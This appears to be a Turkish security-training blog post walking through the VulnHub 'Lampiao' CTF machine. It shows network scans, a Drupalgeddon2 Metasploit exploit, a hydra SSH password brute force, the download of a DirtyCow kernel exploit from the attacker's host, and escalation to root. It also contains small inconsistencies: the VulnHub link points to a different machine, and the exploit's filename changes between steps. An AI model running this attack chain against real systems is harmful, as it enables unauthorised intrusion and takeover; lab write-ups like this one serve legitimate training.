[chatbot]
info@ongsec.com

CTF: VulnHub- Lampiao Makine Çözümü

Posted by ong
Eğitim Danışmanlık, Siber Güvenlik 0

Makine Hakkında Bilgiler

Bu makinenin çözümü için önerilen platform VirtualBox‘ dır.

Makinenin amacı makineye saldırarak, root haklarına sahip olup bayrağı ele geçirmek.

Makinenin VulnHub sayfasındaki linki: https://www.vulnhub.com/entry/basic-pentesting-1,216/

O zaman hadi makineyi çözmeye başlayalım

Makinenin Çözüm Adımları

1. İlk olarak saldırı yapacağımız yani kendi sanal makinemizin ip adresini öğreniyoruz.

ifconfig komutu ile ip adresimizi öğreniyoruz. 10.0.2.6 olduğunu tespit ettik.

2. Şimdi de saldırı yapacağımız hedefi tespit etmemiz lazım. Bunun için netdiscover kullanacağım.

netdiscover -r 10.0.2.0/24 komutu yardımıyla hedefin 10.0.2.10 ip adresine sahip olduğunu keşfettik.

3. Şimdi makine hakkında bilgiler elde etmek adına nmap komutunu çalıştıracağım.

nmap -n -Pn -A -sV -sC -p- 10.0.2.10 komutunu çalıştırıyorum.
Buradaki parametreleri incelersek;
-n: DNS çözümlemesi yapma demek.
-Pn: Pingleri devre dışı bırakma.
-A: Agresif tarama yap.
-sV: Açık portta çalışan servisin ne olduğunu bulmaya çalışır.-sC ile birlikte kullanılırsa işe yarar.
-sC: -sV ile versiyon tespiti yaparken nmap scriptlerini kullanır.
-p-: 65535 portun hepsini tarar.
En sonda da hedef sistemin ip adresi yani 10.0.2.10

22 SSH, 80 HTTP ve 1898 HTTP portları açık.

4. Hemen ilk olarak tarayıcıma 10.0.2.10 yazarak gidiyorum.

Kaynak kodunda da bir ip ucu bulamadık.

5. O zaman bir de alt dizinlerini kontrol edelim. Bunun için gobuster kullanacağım.

Burada herhangi bir alt dizin yok.

6. O zaman bir de tarayıcıma 10.0.2.10:1898 diyerek gidelim

Kaynak kodlarını incelediğim zaman Drupal 7 isimli açık kaynaklı bir içerik yönetim sistemi ile karşılaşıyorum.

7. Bu servisle ile ilgili searchsploit i kullanıyorum

Drupal 7 ile ilgili bir çok exploit olduğunu görüyorum.

8. Msfconsole kullanarak sisteme sızmaya çalışalım. search drupal diyerek arama yapıyorum

exploit/unix/webapp/drupal_drupalgeddon2 bunu kullanacağız.

9. O zaman bu exploit’ i kullanmaya başlayalım

Burada: set rhosts 10.0.2.10 diyoruz ve set RPORT 1898 ardından run diyerek saldırımızı başlatıyoruz.

10. Meterpreter session aldığımı görüyorum. Şimdi interaktif shell e geçelim. Bunun için shell yazıyorum

Kararlı interaktif shell almam için kodumu yazıyorum: python3 -c “import pty;pty.spawn(‘/bin/bash’)”

11. Şimdi makinenin içinde gezelim. İlk home dizinine gidince burada bir tiago isimli kullanıcı olduğunu görüyorum. SSH portum açık olduğu için tiago’ nun şifresini hydra ile kırmaya çalışacağım.

12. İlk olarak cewl kullanarak sitenin içindeki kelimelerden bir password listesi oluşturacağım. Bunun için

cewl -w /root/Desktop/first.txt -d 1 -m 5 http://10.0.2.10:1898/ kodu ile wordlistimi oluşturuyorum.

13. Artık elimde kullanıcı adı ve password listesi olduğuna göre hydra ile tiago nun şifresini bulmaya çalışalım

hydra -l tiago -P /root/Desktop/first.txt 10.0.2.10 -t 4 ssh komutunu çalıştırınca tiago’ nun şifresi Virgulino olduğunu tespit ettik.

14. Artık ssh ile bağlanabiliriz.

SSH ile sisteme bağlandık.

15. Makinede izinlere baktığım zaman bir şey bulamıyorum. Burada github’ dan bir araç kullanacağız. Bunun için makinemizde /tmp dizinine gidiyorum

Burada wget https://raw.githubusercontent.com/mzet-/linux-exploit-suggester/master/linux-exploit-suggester.sh -O les.sh ile tmp dizinine indiriyorum ve daha sonra da chmod +x les.sh ile yetki veriyorum.

16. Artık ./les.sh diyince kullanılabilecek exploitleri bana gösteriyor.

Buradan dirtycow 2′ yi seçiyorum.

17. Yeni bir terminal açıyorum ve kalime indirdiğim exploit’ i Lampiao makinesine çekeceğim.

wget http://10.0.2.31/40847.c

18. Dosya iznimi veriyorum: chmod +x 40847.c

19. cat 40847.c diyerek bu dosyayı nasıl çalıştıracağımı görüyorum.

Bunun için ilk olarak: g++ -Wall -pedantic -O2 -std=c++11 -pthread -o dcow 40847.cpp -lutil

Daha sonra da ./dcow yazarak çalıştırıyorum

20. Çalıştırdığım zaman bana root şifresini verdi. Root şifrem: dirtyCowFun

21. Artık root olabilirim

su root yazınca ve şifreyi de dirtyCowFun olarak girince artık root oluyorum

22. Root dizinin altındaki cat flag.txt‘ yi okuyorum

Bayrağım: 9740616875908d91ddcdaa8aea3af366

Sızma testi alanında eğitimler alarak kendinizi ya da kurum personellerinizi geliştirmek istiyorsanız bizimle iletişime geçebilirsiniz.

Diğer CTF çözümlerinde görüşmek üzere. Bizi takip etmeye devam edin…

Share:
Previous Post

CTF: VulnHub- KB-VULN 1 Makine Çözümü
Next Post

CTF: VulnHub- Star Wars Makine Çözümü

Leave a Reply

Your email address will not be published.

You may use these HTML tags and attributes: <a href=""> <abbr> <acronym> <b> <blockquote cite=""> <cite> <code> <del datetime=""> <em> <i> <q cite=""> <strike> <strong>